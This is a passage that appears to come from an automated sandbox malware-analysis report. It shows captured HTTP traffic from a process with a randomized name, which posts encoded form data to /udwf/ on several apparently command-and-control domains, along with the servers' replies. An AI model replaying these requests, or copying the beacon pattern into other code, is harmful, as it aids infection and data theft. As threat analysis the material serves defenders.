                                                                                                                            Nov 10, 2023 09:27:29.368112087 CET74INData Raw: 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61
                                                                                                                            Data Ascii: 16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}
                                                                                                                            Nov 10, 2023 09:27:29.368148088 CET76INData Raw: 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68
                                                                                                                            Data Ascii: ><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/aff
                                                                                                                            Nov 10, 2023 09:27:29.368185997 CET77INData Raw: 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69 6e
                                                                                                                            Data Ascii: cessful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hostin
                                                                                                                            Nov 10, 2023 09:27:29.368223906 CET78INData Raw: 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 65 6e 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55
                                                                                                                            Data Ascii: n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=214
                                                                                                                            Nov 10, 2023 09:27:29.368259907 CET80INData Raw: 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28
                                                                                                                            Data Ascii: if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLo
                                                                                                                            Nov 10, 2023 09:27:29.368295908 CET80INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 70 61 74 68 4e 61 6d 65 29 3c 2f 73
                                                                                                                            Data Ascii: ument.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            1192.168.2.104971523.227.38.7480C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:27:45.358906984 CET83OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.littlehappiez.com
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.littlehappiez.com
                                                                                                                            Referer: http://www.littlehappiez.com/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 188
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 51 31 2f 6c 4d 2b 73 36 4f 59 33 6a 59 4b 42 2f 7a 71 71 61 61 42 49 56 69 78 47 63 51 57 4b 2f 47 6b 74 53 36 47 6e 43 69 2b 36 6c 77 76 74 6c 4a 71 4b 68 69 51 53 42 66 75 38 43 56 66 51 70 5a 45 49 31 53 75 31 6c 76 67 4c 70 51 42 74 33 30 4e 53 54 6e 72 72 41 6a 49 45 57 65 54 4b 75 63 50 32 63 6f 50 4d 64 6c 63 64 38 62 34 64 44 35 39 49 4c 34 6b 53 76 67 32 32 62 78 66 6e 4a 6a 59 45 36 56 32 4a 35 4e 66 66 61 33 62 35 33 71 4e 70 34 77 47 78 56 6a 58 4e 6b 6e 53 58 70 6c 4d 32 74 53 6f 52 39 73 2f 6c 4d 30 6a 78 41 67 67 3d 3d
                                                                                                                            Data Ascii: G0Yxd2Q=Q1/lM+s6OY3jYKB/zqqaaBIVixGcQWK/GktS6GnCi+6lwvtlJqKhiQSBfu8CVfQpZEI1Su1lvgLpQBt30NSTnrrAjIEWeTKucP2coPMdlcd8b4dD59IL4kSvg22bxfnJjYE6V2J5Nffa3b53qNp4wGxVjXNknSXplM2tSoR9s/lM0jxAgg==
                                                                                                                            Nov 10, 2023 09:27:45.742500067 CET85INHTTP/1.1 404 Not Found
                                                                                                                            Date: Fri, 10 Nov 2023 08:27:45 GMT
                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            X-Sorting-Hat-PodId: 293
                                                                                                                            X-Sorting-Hat-ShopId: 83935199526
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-ShopId: 83935199526
                                                                                                                            X-ShardId: 293
                                                                                                                            Content-Language: en-US
                                                                                                                            Set-Cookie: localization=US; path=/; expires=Sun, 10 Nov 2024 08:27:45 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22USMA%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=littlehappiez.com; path=/; expires=Sat, 11 Nov 2023 08:27:45 GMT; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_y=4449291f-7672-4969-ab63-6c8c671c5b94; Expires=Sat, 09-Nov-24 08:27:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Set-Cookie: _shopify_s=598daef1-c1fc-4481-949d-30a60bd7f1d1; Expires=Fri, 10-Nov-23 08:57:45 GMT; Domain=littlehappiez.com; Path=/; SameSite=Lax
                                                                                                                            Server-Timing: processing;dur=137
                                                                                                                            X-Shopify-Stage: production
                                                                                                                            Content-Security-Policy: ; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=8cd67cc6-53bc-44c
                                                                                                                            Data Raw:
                                                                                                                            Data Ascii:
                                                                                                                            Nov 10, 2023 09:27:45.742522001 CET86INData Raw: 2d 39 31 61 64 2d 34 36 34 64 64 37 36 37 39 62 31 32 0d 0a 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 58 2d 44 6f 77 6e 6c 6f 61 64 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 6f 70 65 6e 0d 0a 58
                                                                                                                            Data Ascii: -91ad-464dd7679b12X-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontrol
                                                                                                                            Nov 10, 2023 09:27:45.742536068 CET87INData Raw: 36 37 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c 68 07 dd 29 5b b6 2a a7 6b d3 76 1b 90 76 c5 3a 60 d8 de 68 89 b6 d8 c8 a2 46 d1 76 d2 a2 ff 7d 87 a4 28 4b 89 d3 ae 09 1a f3 72 ae df b9 f0 b8 f9 0f af 7e bf fc
                                                                                                                            Data Ascii: 679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]
                                                                                                                            Nov 10, 2023 09:27:45.742547989 CET87INData Raw: 8c 18 81 16 bc 9c 59 a6 d0 8f 63 90 60 e4 5d 4d cc 9a ee fe 71 74 22 7e d0 09 38 4e c5 c7 af 97 2f 5f 63 95 22 e6 4a b7 de 95 13 0f 07 ea b1 f9 c8 19 54 99 9e 6e 9d 8b 3c 50 38 7c 1b 24 70 3d 9d b9 f1 02 5d da 95 bf 9c cf 15 3e f0 e1 c6 00 d3 0c
                                                                                                                            Data Ascii: Yc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVt
                                                                                                                            Nov 10, 2023 09:27:45.742562056 CET87INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            10192.168.2.104972584.32.84.3280C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:18.175122976 CET174OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.tutorwave.online
                                                                                                                            Referer: http://www.tutorwave.online/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 208
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 43 38 33 43 47 54 6c 65 32 6f 50 73 77 51 6c 35 59 2b 38 53 44 35 67 57 53 31 7a 79 33 59 52 6c 74 52 59 57 4b 76 51 79 74 5a 58 67 75 62 47 32 45 70 58 63 42 42 38 6a 56 43 7a 42 2f 66 69 61 4f 44 35 49 31 32 4a 66 55 62 38 68 72 31 69 6d 51 31 58 57 67 79 62 48 43 48 4d 44 50 6c 79 74 7a 54 31 48 7a 49 55 76 4e 6a 35 30 34 44 33 62 62 4e 36 76 39 34 4a 58 52 55 2b 45 30 6d 59 61 61 6a 65 6e 33 47 76 65 38 43 32 52 55 78 6f 44 65 37 4b 32 65 49 6f 6c 54 64 4c 7a 4a 50 4d 7a 5a 66 72 44 6e 33 7a 44 42 68 37 44 2b 58 62 37 67 41 46 58 47 62 6c 76 2b 6b 4f 58 63 6b 33 68 5a 5a 31 4d 72 2b 45 3d
                                                                                                                            Data Ascii: G0Yxd2Q=C83CGTle2oPswQl5Y+8SD5gWS1zy3YRltRYWKvQytZXgubG2EpXcBB8jVCzB/fiaOD5I12JfUb8hr1imQ1XWgybHCHMDPlytzT1HzIUvNj504D3bbN6v94JXRU+E0mYaajen3Gve8C2RUxoDe7K2eIolTdLzJPMzZfrDn3zDBh7D+Xb7gAFXGblv+kOXck3hZZ1Mr+E=


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            11192.168.2.104972684.32.84.3280C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:20.903774977 CET176OUTPOST /udwf/ HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                            Origin: http://www.tutorwave.online
                                                                                                                            Referer: http://www.tutorwave.online/udwf/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 1220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: no-cache
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Data Raw: 47 30 59 78 64 32 51 3d 43 38 33 43 47 54 6c 65 32 6f 50 73 77 51 6c 35 59 2b 38 53 44 35 67 57 53 31 7a 79 33 59 52 6c 74 52 59 57 4b 76 51 79 74 59 44 67 75 70 2b 32 45 4f 4c 63 41 42 38 6a 4c 79 7a 41 2f 66 69 69 4f 44 42 4d 31 32 55 6f 55 5a 45 68 71 51 32 6d 62 6b 58 57 33 69 62 48 50 6e 4d 47 43 46 79 43 7a 54 6c 4c 7a 49 45 76 4e 6a 35 30 34 41 66 62 53 38 36 76 2f 34 4a 59 48 6b 2b 49 77 6d 59 2b 61 6a 58 63 33 47 62 6b 38 7a 57 52 55 52 34 44 63 4e 65 32 58 49 6f 72 55 64 4c 72 4a 50 41 6f 5a 66 33 68 6e 33 48 6c 42 6d 50 44 39 43 2b 67 35 54 4e 78 66 70 52 37 33 58 79 52 61 52 36 56 43 73 31 38 77 70 75 46 6a 45 75 55 49 39 38 48 66 2b 47 53 46 68 6d 67 37 44 53 37 35 49 32 37 46 4f 42 51 77 66 4e 63 74 67 30 74 65 76 64 4e 61 5a 4f 58 65 49 32 6c 56 66 30 77 50 6a 79 53 6d 64 79 61 48 6c 6b 6c 32 42 69 4f 49 58 46 70 70 42 69 5a 32 55 30 44 46 66 73 4a 5a 68 4e 43 44 72 47 6a 66 47 45 4e 47 42 34 45 5a 6d 30 68 45 37 52 77 66 51 35 53 66 79 67 6d 79 46 74 4c 42 58 55 6b 55 53 48 46 67 4f 78 77 31 38 6b 65 6f 46 58 44 50 43 37 43 65 61 44 6c 44 6c 45 38 61 62 30 30 64 68 6e 44 4a 38 55 37 7a 41 54 38 79 41 79 64 71 35 52 2b 2b 79 7a 46 62 4f 36 53 52 4a 43 58 52 6b 4e 78 67 50 79 66 6c 4a 70 2b 48 37 4d 6b 57 48 72 32 64 4e 50 65 57 39 5a 37 4a 48 31 2b 58 45 65 73 39 68 31 54 53 74 6a 64 55 78 33 31 4d 73 4f 56 6a 43 48 32 6a 37 78 73 6c 32 74 49 49 42 65 53 51 36 39 63 39 68 47 6a 70 6f 43 4c 30 42 4b 61 79 74 49 72 65 33 4c 69 50 62 51 47 53 53 4a 47 64 65 58 50 34 5a 6c 63 4a 35 78 31 49 55 50 41 74 71 53 6d 62 48 4e 76 55 53 2b 44 4e 43 6f 66 7a 47 30 47 45 56 4e 7a 35 7a 79 67 2b 38 42 2b 4f 50 55 4e 48 4d 55 75 35 46 4a 70 30 4d 69 59 5a 64 49 64 6b 65 63 6b 6a 49 30 65 49 6b 6e 6e 63 42 34 62 54 58 36 47 75 6c 55 53 76 31 6a 72 50 58 76 49 4e 38 69 6d 54 44 71 32 57 64 4b 54 50 6f 4d 50 5a 4e 6d 61 31 47 66 4f 46 35 76 4b 51 55 48 4f 6b 37 33 65 32 2b 45 78 44 76 71 6d 49 6e 77 6d 36 52 43 61 42 6a 4e 51 61 72 72 56 6a 64 58 6e 54 4f 63 64 48 34 77 74 43 34 46 63 30 77 44 54 6f 79 46 4f 37 47 4d 61 76 45 52 67 42 50 4f 33 51 4d 76 75 37 6b 76 41 66 35 69 4d 64 75 57 77 75 75 48 70 46 41 7a 42 36 79 68 43 2f 78 47 6e 4b 73 56 76 4a 69 56 4d 58 52 7a 33 6c 68 48 77 57 56 54 38 4a 47 5a 43 7a 7a 50 4d 79 63 57 45 61 74 46 78 41 58 50 73 35 4a 50 78 4f 7a 32 49 6e 42 50 66 68 55 30 61 77 4d 6c 4b 35 50 6f 72 77 45 6f 31 46 54 61 55 70 50 44 53 71 56 54 73 31 56 54 4f 33 46 33 6a 58 36 55 49 6c 66 4b 49 47 6c 54 44 6e 77 46 41 69 6a 34 52 51 70 58 45 47 49 79 68 4d 67 65 64 33 4d 41 46 2b 7a 62 58 4b 58 42 44 42 70 53 71 49 64 39 79 41 56 73 2b 6b 64 46 55 50 5a 50 78 6c 34 39 4b 2f 45 42 62 43 4c 56 62 61 4e 4c 63 6c 4f 77 45 56 4e 37 7a 46 47 47 78 64 58 61 49 4e 78 73 33 6c 32 62 5a 74 54 4d 41 41 54 4b 79 38 36 47 44 38 5a 54 47 67 68 33 2b 6d 79 6b 4e 57 45 43 63 46 4e 75 61 77 33 73 35 70 65 65 54 6c 49 52 68 42 42 43 66 63 51 66 30 43 57 4f 52 68 6b 43 63 61 76 66 47 33 37 6b 5a 30 69 6c 5a 65 39 35 2f 33 69 31 57 6e 78 7a 6d 4a 37 4b 58 68 45 78 54 66 69 4f 6a 79 35 7a 65 33 46 63 2f 48 46 51 75 39 33 31 6c 41 78 70 4f 6e 2b 30 6e 79 6b 78 58 56 55 58 44 4c 6e 61 46 35 68 33 75 44 47 36 4d 76 31 4d 6e 6b 6e 41 72 49 55 50 4d 4f 38 4c 38 39 74 76 4d 6c 37 74 76 36 64 73 72 4e 61 55 55 74 64 2f 46 78 39 58 4f 41 77 76 42 76 6a 2f 4c 44 69 38 65 55 38 6d 56 2b 38 51 62 53 4d 72 65 7a 66 44 53 68 77 48 66 2b 77 64 6b 31 53 34 51 68 64 33 33 2f 37 68 58 69 67 51 49 34 2b 76 6f 36 33 44 76 45 55 4f 63 47 37 46 39 38 41 65 4c 51 43 44 67 62 65 4c 42 2f 63 36 74 5a 65 49 43 2f 61 46 57 4a 77 48 57 4c 75 43 58 42 4b 52 6d 55 42 64 32 37 44 36 64 34 66 54 45 4f 39 4d 6c 6a 73 52 38
                                                                                                                            Data Ascii: G0Yxd2Q=C83CGTle2oPswQl5Y+8SD5gWS1zy3YRltRYWKvQytYDgup+2EOLcAB8jLyzA/fiiODBM12UoUZEhqQ2mbkXW3ibHPnMGCFyCzTlLzIEvNj504AfbS86v/4JYHk+IwmY+ajXc3Gbk8zWRUR4DcNe2XIorUdLrJPAoZf3hn3HlBmPD9C+g5TNxfpR73XyRaR6VCs18wpuFjEuUI98Hf+GSFhmg7DS75I27FOBQwfNctg0tevdNaZOXeI2lVf0wPjySmdyaHlkl2BiOIXFppBiZ2U0DFfsJZhNCDrGjfGENGB4EZm0hE7RwfQ5SfygmyFtLBXUkUSHFgOxw18keoFXDPC7CeaDlDlE8ab00dhnDJ8U7zAT8yAydq5R++yzFbO6SRJCXRkNxgPyflJp+H7MkWHr2dNPeW9Z7JH1+XEes9h1TStjdUx31MsOVjCH2j7xsl2tIIBeSQ69c9hGjpoCL0BKaytIre3LiPbQGSSJGdeXP4ZlcJ5x1IUPAtqSmbHNvUS+DNCofzG0GEVNz5zyg+8B+OPUNHMUu5FJp0MiYZdIdkeckjI0eIknncB4bTX6GulUSv1jrPXvIN8imTDq2WdKTPoMPZNma1GfOF5vKQUHOk73e2+ExDvqmInwm6RCaBjNQarrVjdXnTOcdH4wtC4Fc0wDToyFO7GMavERgBPO3QMvu7kvAf5iMduWwuuHpFAzB6yhC/xGnKsVvJiVMXRz3lhHwWVT8JGZCzzPMycWEatFxAXPs5JPxOz2InBPfhU0awMlK5PorwEo1FTaUpPDSqVTs1VTO3F3jX6UIlfKIGlTDnwFAij4RQpXEGIyhMged3MAF+zbXKXBDBpSqId9yAVs+kdFUPZPxl49K/EBbCLVbaNLclOwEVN7zFGGxdXaINxs3l2bZtTMAATKy86GD8ZTGgh3+mykNWECcFNuaw3s5peeTlIRhBBCfcQf0CWORhkCcavfG37kZ0ilZe95/3i1WnxzmJ7KXhExTfiOjy5ze3Fc/HFQu931lAxpOn+0nykxXVUXDLnaF5h3uDG6Mv1MnknArIUPMO8L89tvMl7tv6dsrNaUUtd/Fx9XOAwvBvj/LDi8eU8mV+8QbSMrezfDShwHf+wdk1S4Qhd33/7hXigQI4+vo63DvEUOcG7F98AeLQCDgbeLB/c6tZeIC/aFWJwHWLuCXBKRmUBd27D6d4fTEO9MljsR8


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                            12192.168.2.104972784.32.84.3280C:\Program Files (x86)\dNAGqKTZGUAwaxVqazHCxkYGeHKBIiEYPiPMKrHtQXpznvGBaeqnolUoXkFHVbdDlBIbtsRYWxSQYDD\xIXlFDyvSnsfUSfsjsGwj.exe
                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                            Nov 10, 2023 09:28:23.619740963 CET177OUTGET /udwf/?G0Yxd2Q=P+fiFlpl7OLgwg5VHMgiIoMqSXbT5qRAvhgaNfc+psLdu/aEMeH5P0Irdy+G4rOOLUFD4nVEMYENkV+qciPdkHTOCgwyI1K3xg==&vhQT=aV8PeNo0MvDl1 HTTP/1.1
                                                                                                                            Host: www.tutorwave.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                            Nov 10, 2023 09:28:23.815479040 CET178INHTTP/1.1 200 OK
                                                                                                                            Server: hcdn
                                                                                                                            Date: Fri, 10 Nov 2023 08:28:23 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 10066
                                                                                                                            Connection: close
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            x-hcdn-request-id: f9c5cb9b94132774d2877d7f51617e99-phx-edge2
                                                                                                                            Expires: Fri, 10 Nov 2023 08:28:22 GMT
                                                                                                                            Cache-Control: no-cache
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 32 2e 31 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 37 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3e 3c 2f 73 63 72 69 70 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 35 2e 33 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 26 73 75 62 73 65 74 3d 63 79 72 69 6c 6c 69 63 2c 63 79 72 69 6c 6c 69 63 2d 65 78 74 2c 67 72 65 65 6b 2c 67 72 65 65 6b 2d 65 78 74 2c 6c 61 74 69 6e 2d 65 78 74 2c 76 69 65 74 6e 61 6d 65 73 65 22 20 72 65 6c 3d 73 74 79 6c 65 73 68 65 65 74 3e 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b
                                                                                                                            Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;
